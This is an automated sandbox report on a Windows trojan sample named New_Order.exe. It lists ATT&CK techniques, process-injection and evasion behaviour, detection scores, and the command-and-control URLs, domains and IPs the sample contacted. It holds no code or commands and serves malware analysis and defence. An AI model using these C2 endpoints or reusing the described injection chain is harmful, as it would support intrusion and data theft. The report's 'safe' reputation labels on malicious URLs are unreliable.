          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionAccess Token Manipulation1Virtualization/Sandbox Evasion3OS Credential DumpingSecurity Software Discovery231Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsProcess Injection612Access Token Manipulation1LSASS MemoryVirtualization/Sandbox Evasion3Remote Desktop ProtocolClipboard Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection612Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Deobfuscate/Decode Files or Information1NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information3LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonSoftware Packing1Cached Domain CredentialsSystem Information Discovery13VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 411746 Sample: New_Order.exe Startdate: 12/05/2021 Architecture: WINDOWS Score: 100 31 www.thelordnelsonwinthorpe.com 2->31 33 www.algaeflipflops.com 2->33 41 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->41 43 Found malware configuration 2->43 45 Malicious sample detected (through community Yara rule) 2->45 47 8 other signatures 2->47 11 New_Order.exe 18 2->11         started        signatures3 process4 file5 29 C:\Users\user\AppData\...\a9g5j8lkcs3.dll, PE32 11->29 dropped 59 Writes to foreign memory regions 11->59 61 Maps a DLL or memory area into another process 11->61 15 svchost.exe 11->15         started        signatures6 process7 signatures8 63 Modifies the context of a thread in another process (thread injection) 15->63 65 Maps a DLL or memory area into another process 15->65 67 Sample uses process hollowing technique 15->67 69 2 other signatures 15->69 18 explorer.exe 6 15->18 injected process9 dnsIp10 35 voiceclubdubai.com 91.148.168.141, 49717, 80 TELEPOINTBG Bulgaria 18->35 37 fwd3.hosts.co.uk 85.233.160.22, 49720, 80 ISIONUKNamescoLimitedGB United Kingdom 18->37 39 15 other IPs or domains 18->39 49 System process connects to network (likely due to code injection or exploit) 18->49 51 Performs DNS queries to domains with low reputation 18->51 22 wscript.exe 18->22         started        signatures11 process12 signatures13 53 Modifies the context of a thread in another process (thread injection) 22->53 55 Maps a DLL or memory area into another process 22->55 57 Tries to detect virtualization through RDTSC time measurements 22->57 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          New_Order.exe39%VirustotalBrowse
          New_Order.exe18%MetadefenderBrowse
          New_Order.exe60%ReversingLabsWin32.Trojan.SpyNoon
          New_Order.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\nshC36E.tmp\a9g5j8lkcs3.dll45%ReversingLabsWin32.Trojan.Pwsx

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          0.2.New_Order.exe.24e0000.4.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.2.svchost.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          0.2.New_Order.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          0.0.New_Order.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.geacasolaro.com/icsm/?b6jPH=FBZdWxvpgT&zZSlDz=7Y2cvYyrvfqxgunt3pZhUV8c5sAKyRnRxEqYxYZ4IV2yKeALIaVm9IYD5cxomw6uu8uh0%Avira URL Cloudsafe
          http://www.hdjakdhf.com/icsm/?b6jPH=FBZdWxvpgT&zZSlDz=TR2dy7NfXkcYQth3vstvigvFAK3lzNu6618cspSNEjM/3bTBgf6HWtuv8wkgUujUQhHp0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.voiceclubdubai.com/icsm/?b6jPH=FBZdWxvpgT&zZSlDz=S3hZ9hucZB3EtOR58Q5nEiimGsTcBclBSgHOETXnBYv0klj7oHI8wHmFL3huZKvOqIBH0%Avira URL Cloudsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.year-action.xyz/icsm/?zZSlDz=logo8bpUoQPWTQLlZghyT7WZQjxZBYpYOJDMMbKRF5+Nw+24xZrLdIoslO6i49yZrWE6&b6jPH=FBZdWxvpgT0%Avira URL Cloudsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.websitemax.co.uk/icsm/?b6jPH=FBZdWxvpgT&zZSlDz=bWXej36VQHpcttmtRFRFltU4ahfDKjPxw8enIUkEUFX2dD9DLv700yN2zBLMaSA3vN4R0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.roastedorganic.com/icsm/?zZSlDz=zaS0K7Z6s3udRIV54ona/Y7FMvuM79U9hGlb72LKWqTP1QF33lUaB5+awkVfTrm4Szdf&b6jPH=FBZdWxvpgT0%Avira URL Cloudsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          www.voiceclubdubai.com/icsm/0%Avira URL Cloudsafe
          http://www.susanestuart.com/icsm/?zZSlDz=LFJNa/qc3hvrLE0QUTB49n97WnaBmuBdNse4fNn2XI4P2ly5LcfV2yqmdABiPtDvfVQd&b6jPH=FBZdWxvpgT0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.roastedorganic.com
          		75.2.115.196
          		truetrue
            		unknown
            www.year-action.xyz
            		150.95.255.38
            		truetrue
              		unknown
              www.geacasolaro.com
              		62.149.189.71
              		truetrue
                		unknown
                voiceclubdubai.com
                		91.148.168.141
                		truetrue
                  		unknown
                  www.hdjakdhf.com
                  		8.210.40.49
                  		truetrue
                    		unknown
                    susanestuart.com
                    		34.102.136.180
                    		truefalse
                      		unknown
                      fwd3.hosts.co.uk
                      		85.233.160.22
                      		truetrue
                        		unknown
                        www.thelordnelsonwinthorpe.com
                        		94.136.40.51
                        		truefalse
                          		unknown
                          shops.myshopify.com
                          		23.227.38.74
                          		truetrue
                            		unknown
                            www.algaeflipflops.com
                            		64.190.62.111
                            		truefalse
                              		unknown
                              www.charmboutiques.com
                              		unknown
                              		unknowntrue
                                		unknown
                                www.shanghainternational.com
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.voiceclubdubai.com
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.websitemax.co.uk
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.susanestuart.com
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.w-c727or.net
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.kantan-sedori.com
                                          		unknown
                                          		unknowntrue
                                            		unknown

                                            Contacted URLs

                                            NameMaliciousAntivirus DetectionReputation
                                            http://www.geacasolaro.com/icsm/?b6jPH=FBZdWxvpgT&zZSlDz=7Y2cvYyrvfqxgunt3pZhUV8c5sAKyRnRxEqYxYZ4IV2yKeALIaVm9IYD5cxomw6uu8uhtrue
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.hdjakdhf.com/icsm/?b6jPH=FBZdWxvpgT&zZSlDz=TR2dy7NfXkcYQth3vstvigvFAK3lzNu6618cspSNEjM/3bTBgf6HWtuv8wkgUujUQhHptrue
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.voiceclubdubai.com/icsm/?b6jPH=FBZdWxvpgT&zZSlDz=S3hZ9hucZB3EtOR58Q5nEiimGsTcBclBSgHOETXnBYv0klj7oHI8wHmFL3huZKvOqIBHtrue
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.year-action.xyz/icsm/?zZSlDz=logo8bpUoQPWTQLlZghyT7WZQjxZBYpYOJDMMbKRF5+Nw+24xZrLdIoslO6i49yZrWE6&b6jPH=FBZdWxvpgTtrue
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.websitemax.co.uk/icsm/?b6jPH=FBZdWxvpgT&zZSlDz=bWXej36VQHpcttmtRFRFltU4ahfDKjPxw8enIUkEUFX2dD9DLv700yN2zBLMaSA3vN4Rtrue
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.roastedorganic.com/icsm/?zZSlDz=zaS0K7Z6s3udRIV54ona/Y7FMvuM79U9hGlb72LKWqTP1QF33lUaB5+awkVfTrm4Szdf&b6jPH=FBZdWxvpgTtrue
                                            • Avira URL Cloud: safe
                                            		unknown
                                            www.voiceclubdubai.com/icsm/true
                                            • Avira URL Cloud: safe
                                            		low
                                            http://www.susanestuart.com/icsm/?zZSlDz=LFJNa/qc3hvrLE0QUTB49n97WnaBmuBdNse4fNn2XI4P2ly5LcfV2yqmdABiPtDvfVQd&b6jPH=FBZdWxvpgTfalse
                                            • Avira URL Cloud: safe
                                            		unknown

                                            URLs from Memory and Binaries

                                            NameSourceMaliciousAntivirus DetectionReputation
                                            http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmpfalse
                                              		high
                                              http://www.fontbureau.comexplorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmpfalse
                                                		high
                                                http://www.fontbureau.com/designersGexplorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmpfalse
                                                  		high
                                                  http://www.fontbureau.com/designers/?explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmpfalse
                                                    		high
                                                    http://www.founder.com.cn/cn/bTheexplorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmpfalse
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://www.fontbureau.com/designers?explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmpfalse
                                                      		high
                                                      http://www.tiro.comexplorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.fontbureau.com/designersexplorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmpfalse
                                                        		high
                                                        http://nsis.sf.net/NSIS_ErrorErrorNew_Order.exefalse
                                                          		high
                                                          http://www.goodfont.co.krexplorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://www.lcn.com/parked-domains/index?/=/domain/websitemax.co.ukwscript.exe, 00000007.00000002.498023186.0000000004EF2000.00000004.00000001.sdmpfalse
                                                            		high
                                                            http://www.carterandcone.comlexplorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://www.sajatypeworks.comexplorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://www.typography.netDexplorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmpfalse
                                                              		high
                                                              http://www.founder.com.cn/cn/cTheexplorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://fontfabrik.comexplorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.founder.com.cn/cnexplorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              		unknown
                                                              http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmpfalse
                                                                		high
                                                                http://nsis.sf.net/NSIS_ErrorNew_Order.exefalse
                                                                  		high
                                                                  http://www.jiyu-kobo.co.jp/explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://www.fontbureau.com/designers8explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmpfalse
                                                                    		high
                                                                    http://www.fonts.comexplorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmpfalse
                                                                      		high
                                                                      http://www.sandoll.co.krexplorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://www.urwpp.deDPleaseexplorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://www.zhongyicts.com.cnexplorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://www.sakkal.comexplorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      		unknown

                                                                      Contacted IPs

                                                                      • No. of IPs < 25%
                                                                      • 25% < No. of IPs < 50%
                                                                      • 50% < No. of IPs < 75%
                                                                      • 75% < No. of IPs

                                                                      Public

                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                      75.2.115.196
                                                                      		www.roastedorganic.comUnited States
                                                                      		16509AMAZON-02UStrue
                                                                      62.149.189.71
                                                                      		www.geacasolaro.comItaly
                                                                      		31034ARUBA-ASNITtrue
                                                                      91.148.168.141
                                                                      		voiceclubdubai.comBulgaria
                                                                      		31083TELEPOINTBGtrue
                                                                      23.227.38.74
                                                                      		shops.myshopify.comCanada
                                                                      		13335CLOUDFLARENETUStrue
                                                                      34.102.136.180
                                                                      		susanestuart.comUnited States
                                                                      		15169GOOGLEUSfalse
                                                                      85.233.160.22
                                                                      		fwd3.hosts.co.ukUnited Kingdom
                                                                      		8622ISIONUKNamescoLimitedGBtrue
                                                                      8.210.40.49
                                                                      		www.hdjakdhf.comSingapore
                                                                      		45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCtrue
                                                                      150.95.255.38
                                                                      		www.year-action.xyzJapan7506INTERQGMOInternetIncJPtrue

                                                                      General Information

                                                                      Joe Sandbox Version:32.0.0 Black Diamond
                                                                      Analysis ID:411746
                                                                      Start date:12.05.2021
                                                                      Start time:06:08:51
                                                                      Joe Sandbox Product:CloudBasic
                                                                      Overall analysis duration:0h 9m 49s
                                                                      Hypervisor based Inspection enabled:false
                                                                      Report type:full
                                                                      Sample file name:New_Order.exe
                                                                      Cookbook file name:default.jbs
                                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                      Number of analysed new started processes analysed:25
                                                                      Number of new started drivers analysed:0
                                                                      Number of existing processes analysed:0
                                                                      Number of existing drivers analysed:0
                                                                      Number of injected processes analysed:1
                                                                      Technologies:
                                                                      • HCA enabled
                                                                      • EGA enabled
                                                                      • HDC enabled
                                                                      • AMSI enabled
                                                                      Analysis Mode:default
                                                                      Analysis stop reason:Timeout
                                                                      Detection:MAL
                                                                      Classification:mal100.troj.evad.winEXE@7/3@13/8
                                                                      EGA Information:Failed
                                                                      HDC Information:
                                                                      • Successful, ratio: 65.7% (good quality ratio 60.7%)
                                                                      • Quality average: 72.7%
                                                                      • Quality standard deviation: 31%
                                                                      HCA Information:
                                                                      • Successful, ratio: 88%
                                                                      • Number of executed functions: 95
                                                                      • Number of non-executed functions: 59
                                                                      Cookbook Comments:
                                                                      • Adjust boot time
                                                                      • Enable AMSI
                                                                      • Found application associated with file extension: .exe

                                                                      Simulations

                                                                      Behavior and APIs

                                                                      No simulations

                                                                      Joe Sandbox View / Context

                                                                      IPs

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                      75.2.115.196PO#6275473, Shipping.exeGet hashmaliciousBrowse
                                                                      • www.neverpossible.com/nyr/?hFN=HMvQt6bkCevDbBHl57tIpg2VEEGTCu7btVM4jmpr9u1g6ochkRM7DKqFK8ehddD2fJuq&znp8sT=8pwxRHeHx
                                                                      file.exeGet hashmaliciousBrowse
                                                                      • www.officialtimelessbeauty.com/ud9e/?8pK0l4=P93bHQjnxxVAZ9Sn5t3lLhH96Scwn9CJKfcYg3q1h+dYAJf5pCDrtfQdckA+HT/QOAgK&EhU45z=gdJpOxNhdV
                                                                      file.exeGet hashmaliciousBrowse
                                                                      • www.officialtimelessbeauty.com/ud9e/?KtxD=P93bHQjnxxVAZ9Sn5t3lLhH96Scwn9CJKfcYg3q1h+dYAJf5pCDrtfQdckA+HT/QOAgK&p0D=AdhDQXr
                                                                      Bill Of Lading & Packing List.pdf.gz.exeGet hashmaliciousBrowse
                                                                      • www.officialtimelessbeauty.com/ud9e/?M6cphXg=P93bHQjnxxVAZ9Sn5t3lLhH96Scwn9CJKfcYg3q1h+dYAJf5pCDrtfQdcnguIyvoQlJN&VtX8=J48HPvgx
                                                                      raw f.exeGet hashmaliciousBrowse
                                                                      • www.officialtimelessbeauty.com/ud9e/?inCTmJ0x=P93bHQjnxxVAZ9Sn5t3lLhH96Scwn9CJKfcYg3q1h+dYAJf5pCDrtfQdckA+HT/QOAgK&lnxdA=rBZlir70eHDp
                                                                      91.148.168.14141RFQ00952319 order specificatio.exeGet hashmaliciousBrowse
                                                                      • microchiip.com/iykelink/
                                                                      46DOCUMENT449323.exeGet hashmaliciousBrowse
                                                                      • microchiip.com/iykelink/
                                                                      19DOC8943.exeGet hashmaliciousBrowse
                                                                      • microchiip.com/iykelink/
                                                                      23.227.38.74correct invoice.exeGet hashmaliciousBrowse
                                                                      • www.lovereeko.com/s5cm/?Zh3XHBo=1FGxjFcj1FUPzS/D0SlDguBIAwatlX2WBNFXThGVt5K3dMRyhfFKBeUeQKKI53c+UOaemgtTFA==&Xv0Hzp=j0Dx
                                                                      PP,Sporda.exeGet hashmaliciousBrowse
                                                                      • www.buymobilia.com/ugtw/?CVvTU=eThLp0qHv8&-Z=EKeLO8zcMggvyAnqu6sC/Qc/mwltFAuWVzDVO+nGfwm2nIuXQAQy4fFMC2pIsww48MiRk2Tftg==
                                                                      New Order.exeGet hashmaliciousBrowse
                                                                      • www.thirdgenerationfarms.com/un8c/?l4=1bNDCf9Pbhw&a2MLWLu=K7pYdtPf1O8pkq5RJpQL9NxmcqWMJU+Ppy9tvWhY4bI/nVqWSKBoLDAkJ733m7sxbxGP
                                                                      slot Charges.exeGet hashmaliciousBrowse
                                                                      • www.melaniesalascosmetics.com/u8nw/?iL3=OMuX02IYc5Ry0CQoPq4Nk832vdQs1BoNEyIrcTfOmq7/yl/rKnuAOoEnA6+SduwRjnFtQLe2lQ==&z6A=7n3h7JeH
                                                                      WAkePI6vWufG5Bb.exeGet hashmaliciousBrowse
                                                                      • www.dtmfitwear.com/i3cn/?o6A=adsPEH&o81L=H7+d7rkdlFG2nJnRYlgPOAiJBnunM3J+jeKjPbRv+UYLXY3B67SpW8jkP/G3pjkkmaap
                                                                      PO09641.exeGet hashmaliciousBrowse
                                                                      • www.safegrinder.com/or4i/?UL=ER-POL&r6t0=bE8h/5YlyIaGfqFoj5Gnx56lPI3pmXv2ej3H/Ly1qjs4t+LIMarOZaaU39382eFE9bBmbj0G0Q==
                                                                      PO#6275473, Shipping.exeGet hashmaliciousBrowse
                                                                      • www.maluss.com/nyr/?znp8sT=8pwxRHeHx&hFN=MKniHD/KKNZ944A0QkseLq559MRPs5jQaAqVav9SZ3PAwf03LQBPNZ+ImUBZS4FtrISW
                                                                      4LkSpeVqKR.exeGet hashmaliciousBrowse
                                                                      • www.funnyfootballmugs.com/uoe8/?rDHpw=oRF9sMnf9PdLhjUOIBAEDWVppNUvEE2O6ED6s7IbEJi5z3I9xavY20aFrDWDg7pV30V8&V2=LhqpTfJ8
                                                                      PO889876.pdf.exeGet hashmaliciousBrowse
                                                                      • www.soberrituals.com/a7dr/?NTots4J=tjW8ooLTa1jsWUklWWMZll7OVycfhiXpLtdzqL9aLAWMUkY+/Iy+agj0kOGNTOmqAWvW&Ch9De=9rj01Zg0
                                                                      Il nuovo ordine e nell'elenco allegato.exeGet hashmaliciousBrowse
                                                                      • www.sunflowermoonstudio.com/3nop/
                                                                      Order Euro 890,000.exeGet hashmaliciousBrowse
                                                                      • www.salonandspaworld.com/nbg/?AnE=N0DpoDyPy2&GzuDf=pEf6xflKLJsdCsdUJB49tHY3u81x5ITOFjKvog1CNLboxxP0rMA1boKXAxg6YVhGFy4W
                                                                      products order pdf .exeGet hashmaliciousBrowse
                                                                      • www.vrolin.com/nt8e/?jfLlfJ=9rUhSLlxSB2&uR-lx=++xYuLJgoH6pp3kD7RvwfttHqcXzQyvEvUgnOCU49uNqHCcn0mAStAECI82CVhbRI5Zx
                                                                      REVISED ORDER.exeGet hashmaliciousBrowse
                                                                      • www.shamansmoke.com/owws/?uDKhk=JfrPs86HdHGxMH&0pn=sHG+rQoOJeG4yTomgNlDQDPnHQ0IPx4pk+i/lkC8Qh0EEzCngsrhrbrKo7rF6GEUFueH
                                                                      NEW ORDER.exeGet hashmaliciousBrowse
                                                                      • www.melaniesalascosmetics.com/u8nw/?GVIp=OMuX02IYc5Ry0CQoPq4Nk832vdQs1BoNEyIrcTfOmq7/yl/rKnuAOoEnA6+rCfQStxZqQLex2g==&tzr4=jlIXVLPHc
                                                                      PROFORMA INVOICE210505133444.xlsxGet hashmaliciousBrowse
                                                                      • www.krewdog.com/hci/?HxolvBpX=A66Wlw4/Hrn0D6Biie/ZwxRaZIzTFJAuk4a3Hyus0i/oquN3TyNySX6ptiaSdx39RKDNRw==&NpJ=fDH4E
                                                                      Quotation_05052021.Pdf.exeGet hashmaliciousBrowse
                                                                      • www.moondusht.com/ihmh/?jL30vv=24Imnj46Zwn2iPXFlicawvhA5pNJwcknz4KeGPUwn6tGSh+cC2AatXSx6EmNHHhT195k&K2MHFj=ExoxkhRpmdq0
                                                                      MOe7vYpWXW.exeGet hashmaliciousBrowse
                                                                      • www.riandmoara.com/op9s/
                                                                      08917506_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                      • www.marielivet.com/o86d/?W6jDfD=PL9u7p4v7hn5T83wCAG42BUGAPPNW4v8+s1TFKrmIVkrOUDjB/r4wvcv+gOAAG+Oa4qYtq3B7Q==&Yn=ybdHh8KP02GTtb
                                                                      202139769574 Shipping Documents.exeGet hashmaliciousBrowse
                                                                      • www.maluss.com/nyr/?tVZl=MKniHD/KKNZ944A0QkseLq559MRPs5jQaAqVav9SZ3PAwf03LQBPNZ+ImXhjCplVxvzR&U4kp=NtxHhLZ8S6kT5jw
                                                                      Remittance Advice pdf.exeGet hashmaliciousBrowse
                                                                      • www.sewadorbsclothing.com/nt8e/?blm=TToywE07YkGPr1SSYVo5Zl0eXSAn7PGjTs4OR5iBsoxazNcvt6mcqDrbAAXGiUlQyBjZ6mutAA==&tVTd=M6AhI

                                                                      Domains

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                      fwd3.hosts.co.ukSWIFT 00395_IMG.exeGet hashmaliciousBrowse
                                                                      • 85.233.160.23
                                                                      krJF4BtzSv.exeGet hashmaliciousBrowse
                                                                      • 85.233.160.24
                                                                      y6f8O0kbEB.exeGet hashmaliciousBrowse
                                                                      • 85.233.160.23
                                                                      S3d02jGrQo.exeGet hashmaliciousBrowse
                                                                      • 85.233.160.22
                                                                      9JFrEPf5w7.exeGet hashmaliciousBrowse
                                                                      • 85.233.160.24
                                                                      Proforma Invoice 2.xlsxGet hashmaliciousBrowse
                                                                      • 85.233.160.23
                                                                      9tRIEZUd1j.exeGet hashmaliciousBrowse
                                                                      • 85.233.160.23
                                                                      Y79FTQtEqG.exeGet hashmaliciousBrowse
                                                                      • 85.233.160.22
                                                                      FeDex Shipment Confirmation.exeGet hashmaliciousBrowse
                                                                      • 85.233.160.23
                                                                      LElwKuxT4D.exeGet hashmaliciousBrowse
                                                                      • 85.233.160.22
                                                                      Shipment Document BL,INV and packing list.exeGet hashmaliciousBrowse
                                                                      • 85.233.160.23
                                                                      Purchase Order pdf.exeGet hashmaliciousBrowse
                                                                      • 85.233.160.22
                                                                      ORDER pdf.exeGet hashmaliciousBrowse
                                                                      • 85.233.160.23
                                                                      Scan-PI497110_pdf.gz.exeGet hashmaliciousBrowse
                                                                      • 85.233.160.22
                                                                      PO 213409701.xlsxGet hashmaliciousBrowse
                                                                      • 85.233.160.23
                                                                      PROFOMA INVOICE pdf.exeGet hashmaliciousBrowse
                                                                      • 85.233.160.22
